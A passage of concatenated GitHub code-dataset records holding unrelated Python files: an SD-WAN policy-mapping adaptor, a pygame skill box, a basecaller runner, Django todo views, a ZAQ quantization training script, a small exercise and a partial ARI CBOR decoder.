metadata value %s because \\\n policy %s does not exist in the SD-WAN controller.', name, data['policyName'])\n \n # Rertrieve and update merge policy\n policy_id = self.api_endpoint.get_data_policy_id_by_name(self.credentials['sdwanMergedPolicyName'])\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n policy['sequences'] = templates.add_cnwan_sequences_to_merge_policy(policy['sequences'], cnwan_seqs, previous_cnwan_remove)\n logger.debug(\"New merge policy is %s\", pprint.pformat(policy['sequences']))\n response = self.api_endpoint.put_data_policy(policy_id, policy, 'create_data_policy_with_all_endpoints')\n \n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'create_data_policy_with_all_endpoints')\n \n def create_approute_policy_with_all_endpoints(self, previous_cnwan_remove = []):\n # Collect all endpoint + sla info for each profile\n cnwan_seqs = []\n \n for name, data in self.app_route_traffic_profiles.items():\n \n defined, policy_id = self.is_policy_defined(data['policyName'], 'AppRoute')\n if defined: \n \n previous_cnwan_remove.append(data['policyName'])\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n if len(policy['sequences']) > 1:\n temp_seqs = templates.change_seq_name(policy, data['policyName'])\n for seq in temp_seqs:\n cnwan_seqs.append(seq)\n else:\n logger.warning('In create_approute_policy_with_all_endpoints, ignoring metadata value %s because \\\n policy %s does not exist in the SD-WAN controller.', name, data['policyName'])\n \n # Rertrieve and update merge policy\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(self.credentials['sdwanMergedPolicyName'])\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n policy['sequences'] = templates.add_cnwan_sequences_to_merge_policy(policy['sequences'], cnwan_seqs, previous_cnwan_remove) \n logger.debug(\"New merge policy 
for AppRoute is %s\", pprint.pformat(policy['sequences']))\n response = self.api_endpoint.put_approute_policy(policy_id, policy, 'create_approute_policy_with_all_endpoints')\n \n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'create_approute_policy_with_all_endpoints')\n \n def is_traffic_profile_defined(self, profileName):\n if profileName in self.app_route_traffic_profiles.keys():\n return True, 'AppRoute'\n elif profileName in self.data_traffic_profiles.keys():\n return True, 'Data'\n else:\n return False, None\n\n\n\n### POLICY MANAGEMENT\n \n def is_policy_defined(self, policyName, policyType):\n if policyType == 'AppRoute':\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(policyName)\n \n elif policyType == 'Data':\n policy_id = self.api_endpoint.get_data_policy_id_by_name(policyName)\n \n else: \n return False, None\n \n \n if policy_id is None:\n return False, None\n else:\n return True, policy_id\n \n def is_policy_in_mappings(self, policyName, policyType):\n \n if policyType == 'AppRoute':\n for name, data in self.app_route_traffic_profiles.items(): \n if data['policyName'] == policyName:\n return True, name\n \n elif policyType == 'Data':\n for name, data in self.data_traffic_profiles.items():\n if data['policyName'] == policyName:\n return True, name\n \n return False, None\n \n \n def empty_approute_policy(self, policy_name, call_origin):\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(policy_name)\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.create_empty_policy(policy)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, call_origin)\n \n \n def add_endpoint_array_approute_policy(self, policy_id, endpoints, call_origin): \n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.add_array_endpoints_to_approute_policy(endpoints, policy)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, call_origin)\n \n \n \n def empty_data_policy(self, policy_name, call_origin):\n policy_id = self.api_endpoint.get_data_policy_id_by_name(policy_name)\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.create_empty_policy(policy)\n response = self.api_endpoint.put_data_policy(policy_id, payload, call_origin)\n \n \n \n def add_endpoint_array_data_policy(self, policy_id, endpoints, call_origin):\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.add_array_endpoints_to_data_policy(endpoints, policy)\n response = self.api_endpoint.put_data_policy(policy_id, payload, call_origin)\n\n \n \n\n### EXPOSED API FUNCITONS\n\n def get_mappings(self):\n\n temp = []\n for name, data in self.app_route_traffic_profiles.items():\n profile = {\n \"metadataKey\" : str(self.metadata_keys),\n \"metadataValue\": name,\n \"policyType\": \"AppRoute\",\n \"policyName\" : data['policyName']\n }\n temp.append(profile)\n\n for name, data in self.data_traffic_profiles.items():\n profile = {\n \"metadataKey\" : str(self.metadata_keys),\n \"metadataValue\": name,\n \"policyType\": \"Data\",\n \"policyName\" : data['policyName']\n\n }\n temp.append(profile)\n\n return temp\n\n def post_mapping(self, mapping):\n\n if mapping[\"metadataKey\"] not in self.metadata_keys:\n 
self.metadata_keys.append(mapping[\"metadataKey\"])\n logger.info('Detected new metadata key %s, adding to list.', mapping[\"metadataKey\"])\n \n \n name = mapping['metadataValue']\n profile_type = mapping['policyType']\n policy_defined_in_mapping, mapping_name = self.is_policy_in_mappings(mapping['policyName'], profile_type)\n\n if name in self.app_route_traffic_profiles.keys() or \\\n name in self.data_traffic_profiles.keys():\n \n msg = 'Ignoring request: the traffic profile ' + name + ' is already defined '\n logger.warning(err.ElementAlreadyDefined(\"post_traffic_profile\", msg))\n\n \n elif policy_defined_in_mapping:\n \n msg = 'Ignoring request: the policy ' + mapping['policyName'] + ' is already defined in the mapping ' + mapping_name\n logger.warning(msg)\n raise err.DuplicatePolicy(msg)\n \n else:\n \n if profile_type == 'AppRoute':\n self.app_route_traffic_profiles[name] = {\n 'policyName': mapping['policyName']\n }\n \n elif profile_type == 'Data':\n self.data_traffic_profiles[name] = {\n 'policyName' : mapping['policyName']\n }\n \n else:\n logger.warning('Ignoring request: unknow traffic policy type.')\n logger.warning(err.UnsupportedPolicyType(profile_type, ['AppRoute', 'Data']))\n\n\n \n\n def delete_mapping(self, profile_name):\n self.check_config()\n self.test_connection()\n \n if profile_name in self.app_route_traffic_profiles.keys(): \n \n #Delete endpoints from the policy\n policy_name = self.app_route_traffic_profiles[profile_name]['policyName']\n policy_defined, _ = self.is_policy_defined(policy_name, 'AppRoute')\n if policy_defined:\n\n self.empty_approute_policy(policy_name,'delete_mapping')\n \n # Regenerate merge policy\n self.create_approute_policy_with_all_endpoints()\n \n \n # Delete associated endpoints from internal variable\n self.delete_service_endpoint_by_profile(profile_name)\n \n # Delete traffic profile from internal variable\n del self.app_route_traffic_profiles[profile_name]\n \n\n elif profile_name in self.data_traffic_profiles.keys():\n \n #Delete endpoints from the policy\n policy_name = self.data_traffic_profiles[profile_name]['policyName']\n policy_defined, _ = self.is_policy_defined(policy_name, 'Data')\n if policy_defined:\n \n self.empty_data_policy(policy_name, 'delete_traffic_profile')\n #No active policies affected because these profiles are never active\n\n # Regenerate merge policy\n self.create_data_policy_with_all_endpoints()\n \n # Delete associated endpoints from internal variable\n self.delete_service_endpoint_by_profile(profile_name)\n\n \n # Delete traffic profile from internal variable\n del self.data_traffic_profiles[profile_name]\n \n else:\n logger.warning(err.CannotFindElement(\"delete_traffic_profile\",\\\n \"This traffic profile does not exist, ignoring request.\"))\n\n\n def put_mapping(self, profile_name, data):\n self.check_config()\n self.test_connection()\n \n \n profile_defined, profile_type = self.is_traffic_profile_defined(profile_name)\n # Verify new policiy is defined\n policy_defined, new_policy_id = self.is_policy_defined(data['policyName'], data['policyType'])\n #Verify policy NOT in use in other mappings\n policy_defined_in_mapping, mapping_name = self.is_policy_in_mappings(data['policyName'], data['policyType'])\n \n if not profile_defined:\n logger.warning(err.CannotFindElement(\"put_traffic_profile\", \\\n \"This traffic profile does not exist, ignoring request.\"))\n \n \n elif not policy_defined:\n logger.warning(err.CannotFindElement(\"put_traffic_profile\", \\\n \"The policy \" + str(data['policyName']) 
+\" does not exist in the sdwan controller, ignoring request.\"))\n \n \n elif policy_defined_in_mapping:\n \n msg = 'Ignoring request: the policy ' + data['policyName'] + ' is already defined in the mapping ' + mapping_name\n logger.warning(msg)\n raise err.DuplicatePolicy(msg)\n \n else:\n #List affected endpoints \n endpoints = self.get_service_endpoints_by_profile(profile_name)\n \n if profile_type == 'AppRoute':\n #Empty old policy\n policy_name = self.app_route_traffic_profiles[profile_name]['policyName']\n self.empty_approute_policy(policy_name, 'put_traffic_profile')\n \n if data['policyType'] == 'AppRoute':\n # AppRoute to AppRoute\n #Add enpoints to new policy\n self.add_endpoint_array_approute_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n #Update internal var\n old_policy = [ self.app_route_traffic_profiles[profile_name]['policyName'] ]\n self.app_route_traffic_profiles[profile_name]['policyName'] = data['policyName']\n \n # Regenerate merge policy\n self.create_approute_policy_with_all_endpoints(old_policy)\n \n else:\n # AppRoute to Data\n #Add endpoints to new policy\n self.add_endpoint_array_data_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n\n \n #Change type of profile\n old_policy = [ self.app_route_traffic_profiles[profile_name]['policyName'] ]\n self.data_traffic_profiles[profile_name] = {\n 'policyName' : data['policyName']\n } \n del self.app_route_traffic_profiles[profile_name]\n\n # Regenerate merge policies\n self.create_data_policy_with_all_endpoints()\n self.create_approute_policy_with_all_endpoints(old_policy)\n \n elif profile_type == 'Data':\n #Empty old policy\n policy_name = self.data_traffic_profiles[profile_name]['policyName']\n self.empty_data_policy(policy_name, 'put_traffic_profile')\n \n if data['policyType'] == 'Data':\n # Data to Data \n \n #Add endpoints to new policy\n self.add_endpoint_array_data_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n # Update internal var\n old_policy = [ self.data_traffic_profiles[profile_name]['policyName'] ]\n self.data_traffic_profiles[profile_name]['policyName'] = data['policyName']\n \n # Regenerate merge policy\n self.create_data_policy_with_all_endpoints(old_policy)\n\n \n else:\n # Data to AppRoute\n \n #Add endpoints to new policy\n self.add_endpoint_array_approute_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n #Change type of profile \n old_policy = [ self.data_traffic_profiles[profile_name]['policyName'] ]\n self.app_route_traffic_profiles[profile_name] = {\n 'policyName': data['policyName']\n }\n del self.data_traffic_profiles[profile_name]\n \n # Regenerate merge policies\n self.create_data_policy_with_all_endpoints(old_policy)\n self.create_approute_policy_with_all_endpoints()\n\n #Update internal endpoint variable\n for ep in endpoints:\n self.srv_endpoints[ep]['policyId'] = new_policy_id\n\n\n\n def extract_profile(self, service):\n if 'metadata' not in service:\n return None\n \n for elem in service['metadata']:\n if elem['key'] in self.metadata_keys:\n return elem['value']\n return None\n \n def get_md_key_not_defined(self, service):\n if 'metadata' not in service:\n return ['MISSING METADATA ARRAY']\n \n not_def = []\n for elem in service['metadata']:\n if elem['key'] not in self.metadata_keys:\n not_def.append(elem['key'])\n \n return not_def\n\n def events(self, updates):\n self.check_config()\n self.test_connection()\n error_events =[]\n \n for elem in updates:\n ipAddress = elem['service']['address']\n portNumber = 
str(elem['service']['port'])\n profileName = self.extract_profile(elem['service'])\n logger.debug('Processing %s event on endpoint %s:%s', elem['event'], ipAddress, portNumber)\n \n \n \n if elem['event'] == 'delete':\n error, error_data = self.delete_service_endpoint(ipAddress, portNumber)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n \n elif profileName is None:\n #Unknown metadata key \n error = {}\n error['status'] = 400\n error['resource'] = elem['service']['name']\n error['title'] = 'MISSING METADATA KEY'\n error['description'] = 'The metadata key ' + str(self.get_md_key_not_defined(elem['service'])) + ' is \\\n not currently defined in the adaptor. Ignoring this event.'\n error_events.append(error)\n \n elif elem['event'] == 'create':\n error, error_data = self.post_service_endpoint(ipAddress, portNumber, profileName)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n \n elif elem['event'] == 'update':\n error, error_data = self.put_service_endpoint(ipAddress, portNumber, profileName)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n\n else:\n #Unknown operation\n error = {}\n error['status'] = 405\n error['resource'] = elem['service']['name']\n error['title'] = 'Unsupoorted eventy type'\n error['description'] = 'The event ' + elem['event'] + ' is not currently \\\n supported. Supported events: create, update and delete.'\n error_events.append(error)\n \n \n self.create_data_policy_with_all_endpoints()\n self.create_approute_policy_with_all_endpoints() \n \n if len(error_events) != 0:\n logger.warning('The following elements were ingored: %s', error_events)\n raise err.PartialEventsError(error_events)\n\n","repo_name":"CloudNativeSDWAN/cnwan-adaptor","sub_path":"adaptor_library/metadata_adaptor/core_lib.py","file_name":"core_lib.py","file_ext":"py","file_size_in_byte":31295,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"33399990847","text":"from GameEntity import GameEntity\nimport random\n\n\nclass SkillBox(GameEntity):\n\n POSSIB_SKILLS = {\n 1: 'TELEPORT_UP',\n 2: 'BIG_JUMP',\n 3: 'GHOST_MODE'\n }\n\n def __init__(self, x_game_init, y_game_init):\n super(SkillBox, self).__init__()\n super(SkillBox, self).setXY(x_game_init, y_game_init)\n\n taille = len(SkillBox.POSSIB_SKILLS)\n diceroll = random.randint(1, taille)\n self.skill_id = diceroll\n self.skillname = SkillBox.POSSIB_SKILLS[diceroll]\n self.visible = True\n\n def updatePosition(self):\n # descente progressive des bonus skill\n x_ent, y_ent = self.getXY()\n self.setXY(x_ent, y_ent - 0.4)\n\n # def markToDisplay(self, surface):\n # x_ent,y_ent = self.getXY()\n # pygame.draw.rect( surface, pygame.Color('BROWN'),\n # pygame.Rect( x_ent,y_ent, 30,30) )\n","repo_name":"wkta/esc_segfault","sub_path":"SkillBox.py","file_name":"SkillBox.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32406692316","text":"import tensorflow as tf\nimport src.api as api\nimport argparse\nimport os\n\nfrom src.controllers.ui_controller import UIController\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', required=True, help='Config filepath.')\n parser.add_argument('-n', '--name', required=False, help='Name of the experiment. 
If none provided, name with a timestamp will be assigned.')\n parser.add_argument('-w', '--warnings', required=False, default=False, action='store_true', help='Display tensorflow warning.')\n args = parser.parse_args()\n verify_args(args)\n set_logging(args)\n return args\n\ndef verify_args(args):\n assert os.path.exists(args.config), 'Config filepath is not valid.'\n assert type(args.name) == str, 'Experiment name must be a string.'\n\ndef set_logging(args):\n if args.warnings == False:\n print(' - Hiding tensorflow output messages.')\n tf.get_logger().setLevel('ERROR')\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\ndef get_user_input(ui_controller):\n ui_controller.print_parameters('model')\n ui_controller.ask_parameters()\n ui_controller.print_parameters('training')\n ui_controller.print_parameters('validation')\n ui_controller.print_parameters('testing')\n ui_controller.ask_parameters()\n ui_controller.ask_retrain()\n ui_controller.ask_retest()\n return ui_controller\n\ndef main(config_path, experiment_name):\n config = api.get_config(config_path)\n api.setup_experiment(experiment_name, config)\n\n ui_controller = UIController(config, experiment_name)\n ui_controller = get_user_input(ui_controller)\n\n if ui_controller.skip_training == False:\n api.train(config, experiment_name, ui_controller.new_training)\n \n if ui_controller.skip_testing == False:\n api.test(config, experiment_name, ui_controller.new_testing)\n api.evaluate(experiment_name)\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args.config, args.name)\n print(' - Script has finished successfully.')","repo_name":"MicrobialDarkMatter/Fishnchips_basecaller","sub_path":"run_fishnchips.py","file_name":"run_fishnchips.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70019090087","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\n\n# Create your views here.\nfrom todos_list_demo.todos.forms import CreateTodoForm\nfrom todos_list_demo.todos.models import Todo\n\n\ndef list_todos(request):\n todos = Todo.objects.all()\n\n context = {\n 'todos': todos,\n }\n\n\n return render(request, 'todos/list_todos.html', context)\n\n\ndef my_profile(request, pk):\n user = User.objects.get(pk=pk)\n\n context = {\n 'user': user\n }\n\n return render(request, 'my_profile.html', context)\n\n\ndef index(request):\n return redirect('list todos')\n\n\ndef create_todo(request):\n if request.method == 'POST':\n form = CreateTodoForm(request.POST)\n\n if form.is_valid():\n form.save()\n redirect('list todos')\n\n else:\n form = CreateTodoForm()\n\n context = {\n 'form': form,\n }\n\n return render(request, 'todos/create_todo.html', context)","repo_name":"kaloyan03/Softuni-Python","sub_path":"Python Web Framework/todos_list_demo/todos_list_demo/todos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71248938727","text":"from __future__ import print_function\nimport os, random\nimport copy\nimport numpy as np\nimport argparse\nimport torch\nimport torchvision\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport network\nfrom utils.visualizer import VisdomPlotter\nfrom utils.loss import *\nfrom dataloader import get_dataloader\nfrom quantization import quantize_model\n\n\nvp = VisdomPlotter('8097', 
env='ZAQ-main')\n\ndef train(args, p_model, q_model, generator, optimizer, epoch):\n p_model.eval()\n q_model.train()\n generator.train()\n optimizer_Q, optimizer_G = optimizer\n\n inter_loss = SCRM().to(args.device)\n\n for i in range(args.epoch_itrs):\n for k in range(5):\n z = torch.randn((args.batch_size, args.nz, 1, 1)).to(args.device)\n optimizer_Q.zero_grad()\n fake = generator(z).detach()\n g_p, p_logit = p_model(fake, True)\n g_q, q_logit = q_model(fake, True)\n loss_Q = F.l1_loss(q_logit, p_logit.detach()) + args.alpha * inter_loss(g_q, g_p)\n \n loss_Q.backward()\n optimizer_Q.step()\n\n z = torch.randn((args.batch_size, args.nz, 1, 1)).to(args.device)\n optimizer_G.zero_grad()\n generator.train()\n fake = generator(z)\n g_p, p_logit = p_model(fake, True) \n g_q, q_logit = q_model(fake, True)\n\n loss_G = - F.l1_loss(q_logit, p_logit) - args.alpha * inter_loss(g_q, g_p) - args.beta * g_p[-1].abs().mean()\n\n loss_G.backward()\n optimizer_G.step()\n\n if i % args.log_interval == 0:\n print('Train Epoch: [{}] [{}/{} ({:.0f}%)]\\tG_Loss: {:.6f} Q_loss: {:.6f}'.format(\n epoch, i, args.epoch_itrs, 100*float(i)/float(args.epoch_itrs), loss_G.item(), loss_Q.item()))\n vp.add_scalar('Loss_Q', (epoch-1)*args.epoch_itrs+i, loss_Q.item())\n vp.add_scalar('Loss_G', (epoch-1)*args.epoch_itrs+i, loss_G.item())\n\ndef test(args, model, test_loader, epoch=0):\n model.eval()\n\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for i, (data, target) in enumerate(test_loader):\n data, target = data.to(args.device), target.to(args.device)\n\n output = model(data)\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nEpoch [{}] Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\\n'.format(\n epoch, test_loss, correct, len(test_loader.dataset),\n 100. 
* correct / len(test_loader.dataset)))\n acc = correct/len(test_loader.dataset)\n return acc\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='ZAQ CIFAR.')\n parser.add_argument('--num_classes', type=int, default=10)\n parser.add_argument('--batch_size', type=int, default=256, metavar='N',\n help='input batch size for training (default: 256)')\n parser.add_argument('--test_batch_size', type=int, default=256, metavar='N',\n help='input batch size for testing (default: 128)')\n \n parser.add_argument('--epochs', type=int, default=300, metavar='N',\n help='number of epochs to train (default: 500)')\n parser.add_argument('--epoch_itrs', type=int, default=60)\n parser.add_argument('--lr_Q', type=float, default=0.1, metavar='LR',\n help='learning rate (default: 0.1)')\n parser.add_argument('--lr_G', type=float, default=1e-3,\n help='learning rate (default: 0.001)')\n parser.add_argument('--data_root', type=str, required=True, default=None)\n\n parser.add_argument('--dataset', type=str, default='cifar10', choices=['cifar10', 'cifar100'],\n help='dataset name (default: cifar10)')\n parser.add_argument('--model', type=str, default='resnet18', \n choices=['mobilenetv2', 'vgg19', 'resnet18', 'resnet20', 'resnet50'],\n help='model name (default: resnet18)')\n parser.add_argument('--weight_decay', type=float, default=5e-4)\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M',\n help='SGD momentum (default: 0.9)')\n parser.add_argument('--device', type=str, default='0',\n help='device for training')\n parser.add_argument('--seed', type=int, default=6786, metavar='S',\n help='random seed (default: 6786)')\n parser.add_argument('--ckpt', type=str, default='')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n parser.add_argument('--nz', type=int, default=256)\n parser.add_argument(\"--alpha\", type=float, default=1)\n parser.add_argument(\"--beta\", type=float, default=0.1)\n parser.add_argument(\"--gamma\", type=float, default=0.1)\n parser.add_argument('--test_only', action='store_true', default=False)\n parser.add_argument('--download', action='store_true', default=False)\n\n # quantization \n parser.add_argument('--weight_bit', type=int, default=6, help='bit-width for parameters')\n parser.add_argument('--activation_bit', type=int, default=8, help='bit-width for act')\n \n args = parser.parse_args()\n\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n \n os.environ['CUDA_VISIBLE_DEVICES'] = args.device\n args.device = torch.device('cuda' if torch.cuda.is_available() else \"cpu\")\n os.makedirs('checkpoint/q_model/', exist_ok=True)\n print(args)\n\n _, test_loader = get_dataloader(args)\n\n args.num_classes = 10 if args.dataset=='cifar10' else 100\n q_model = network.get_model(args)\n generator = network.gan.Generator(nz=args.nz, nc=3, img_size=32)\n \n q_model.load_state_dict(torch.load(args.ckpt))\n print(\"p_model restored from %s\"%(args.ckpt))\n\n # p_model = p_model.to(device)\n q_model = q_model.to(args.device)\n generator = generator.to(args.device)\n p_model = copy.deepcopy(q_model)\n\n # quantization\n q_model = quantize_model(q_model, args)\n quant_acc = test(args, q_model, test_loader, 0)\n print('Quat Acc=%0.4f \\n' % quant_acc)\n\n p_model.eval()\n\n optimizer_Q = 
optim.SGD(q_model.parameters(), lr=args.lr_Q, weight_decay=args.weight_decay, momentum=0.9)\n optimizer_G = optim.Adam(generator.parameters(), lr=args.lr_G)\n \n scheduler_Q = optim.lr_scheduler.MultiStepLR(optimizer_Q, [100, 200], args.gamma)\n scheduler_G = optim.lr_scheduler.MultiStepLR(optimizer_G, [100, 200], args.gamma)\n best_acc = 0\n if args.test_only:\n acc = test(args, q_model, test_loader, 0)\n return\n acc_list = []\n for epoch in range(1, args.epochs + 1):\n # Train\n train(args, p_model=p_model, q_model=q_model, generator=generator, optimizer=[optimizer_Q, optimizer_G], epoch=epoch)\n scheduler_Q.step()\n scheduler_G.step()\n # Test\n acc = test(args, q_model, test_loader, epoch)\n acc_list.append(acc)\n if acc>best_acc:\n best_acc = acc\n print('Saving a best checkpoint ...')\n torch.save(q_model.state_dict(),\"checkpoint/q_model/ZAQ-%s-%s-%sbit.pt\"%(args.dataset, args.model, args.weight_bit))\n torch.save(generator.state_dict(),\"checkpoint/q_model/ZAQ-%s-%s-%sbit-generator.pt\"%(args.dataset, args.model, args.weight_bit))\n vp.add_scalar('Acc', epoch, acc)\n print(\"Best Acc=%.6f\" % best_acc)\n\n import csv\n os.makedirs('log', exist_ok=True)\n with open('log/ZAQ-%s-%s-%sbit.csv'%(args.dataset, args.model, args.param_bits), 'a') as f:\n writer = csv.writer(f)\n writer.writerow(acc_list)\n\nif __name__ == '__main__':\n main()","repo_name":"FLHonker/ZAQ-code","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"70564225129","text":"def min_and_max(num1, num2):\n\tif num1 > num2:\n\t\treturn num2, num1\n\telse:\n\t\treturn num1, num2\n\n\ndef converte_par(numero):\n\t'''Transforma um número par em um número sucessor impar'''\n\treturn numero + ((numero+1)%2)\n\ndef soma_impares(inicio, fim):\n\n\tif inicio%2 == 0:\n\t\tinicio = converte_par(inicio)\n\telse:\n\t\tinicio += 2\n\n\tsoma = 0\n\twhile inicio < fim:\t\t\n\t\tsoma += inicio\n\t\tinicio += 2\n\n\treturn soma\n\n\ndef main():\n\tnum1 = int(input())\n\tnum2 = int(input())\n\n\tnum1, num2 = min_and_max(num1, num2)\n\n\tprint(soma_impares(num1, num2))\n\n\nmain()","repo_name":"douradodev/Uri","sub_path":"Uri/1071_v3.py","file_name":"1071_v3.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23266427398","text":"import enum\nimport logging\nimport struct\nfrom typing import BinaryIO\nimport cbor2\nfrom ace.ari import (\n ARI, AC, EXPR, TNVC, Identity, ReferenceARI, LiteralARI,\n StructType, LITERAL_TYPES\n)\nfrom ace.cborutil import to_diag\nfrom ace.util import is_printable\n\n\nLOGGER = logging.getLogger(__name__)\n\n\n@enum.unique\nclass AriFlag(enum.IntFlag):\n ''' Flags at the front of an ARI. '''\n HAS_NN = 0x80\n HAS_PARAMS = 0x40\n HAS_ISS = 0x20\n HAS_TAG = 0x10\n\n\n@enum.unique\nclass TnvcFlag(enum.IntFlag):\n ''' Flgas at the front of a TNVC. '''\n MIXED = 0x8\n TYPE = 0x4\n NAME = 0x2\n VALUE = 0x1\n\n\nclass ParseError(RuntimeError):\n ''' Indicate an error in ARI parsing. '''\n\n\nclass Decoder:\n ''' The decoder portion of this CODEC. 
'''\n\n def decode(self, buf: BinaryIO) -> ARI:\n ''' Decode an ARI from CBOR bytestring.\n\n :param buf: The buffer to read from.\n :return: The decoded ARI.\n '''\n cbordec = cbor2.CBORDecoder(buf)\n try:\n res = self._decode_ari(cbordec)\n except cbor2.CBORDecodeEOF as err:\n raise ParseError(f'Failed to decode ARI: {err}') from err\n if buf.tell() != len(buf.getbuffer()):\n LOGGER.warning('ARI decoder handled only the first %d octets of %s',\n buf.tell(), to_diag(buf.getvalue()))\n return res\n\n def _decode_ari(self, cbordec):\n flags, = struct.unpack('!B', cbordec.read(1))\n LOGGER.debug('Got flags: 0x%02x', flags)\n str_type = StructType(flags & 0x0F)\n\n if str_type == StructType.LIT:\n try:\n val = cbordec.decode()\n except Exception as err:\n raise ParseError(f'Failed to decode literal value: {err}') from err\n\n type_enum = StructType((flags >> 4) + StructType.BOOL)\n res = LiteralARI(type_enum=type_enum, value=val)\n\n else:\n obj_nn = cbordec.decode() if flags & AriFlag.HAS_NN else None\n LOGGER.debug('Got nickname: %s', obj_nn)\n\n name = cbordec.decode()\n LOGGER.debug('Got name: %s', to_diag(name))\n if not isinstance(name, (bytes, str)):\n raise ParseError(f'Decoded name is not bytes or str, got {type(name)}')\n if isinstance(name, bytes) and is_printable(name):\n name = name.decode('utf-8')\n\n params = self._decode_tnvc(cbordec) if flags & AriFlag.HAS_PARAMS else None\n\n issuer = cbordec.decode() if flags & AriFlag.HAS_ISS else None\n LOGGER.debug('Got issuer: %s', to_diag(issuer))\n if issuer is not None and not isinstance(issuer, bytes):\n raise ParseError(f'Decoded issuer is not bytes, got {type(issuer)}')\n\n tag = cbordec.decode() if flags & AriFlag.HAS_TAG else None\n LOGGER.debug('Got tag: %s', to_diag(issuer))\n if tag is not None and not isinstance(tag, bytes):\n raise ParseError(f'Decoded tag is not bytes, got {type(tag)}')\n\n ident = Identity(\n namespace=obj_nn,\n type_enum=str_type,\n name=name,\n issuer=issuer,\n tag=tag\n )\n res = ReferenceARI(ident=ident, params=params)\n\n return res\n\n def _decode_tnvc(self, cbordec):\n ''' From the document:\n +--------+---------+----------+----------+----------+----------+\n | Flags | # Items | Types | Names | Values | Mixed |\n | [BYTE] | [UINT] | [OCTETS] | [OCTETS] | [OCTETS] | [OCTETS] |\n | | (Opt) | (Opt) | (Opt) | (Opt) | (Opt) |\n +--------+---------+----------+----------+----------+----------+\n '''\n\n flags, = struct.unpack('!B', cbordec.read(1))\n\n count = cbordec.decode() if flags else 0\n\n type_enums = []\n if flags & TnvcFlag.TYPE:\n for _idx in range(count):\n type_id = struct.unpack('!B', cbordec.read(1))[0]\n type_enums.append(StructType(type_id))\n\n if flags & TnvcFlag.NAME:\n raise NotImplementedError\n\n values = []\n if flags & TnvcFlag.VALUE:\n for idx in range(count):\n LOGGER.debug('Decoding TNVC item %d type %s',\n idx, type_enums[idx])\n values.append(self._decode_obj(type_enums[idx], cbordec))\n return values\n\n def _decode_ac_items(self, cbordec):\n # FIXME: workaorund! 
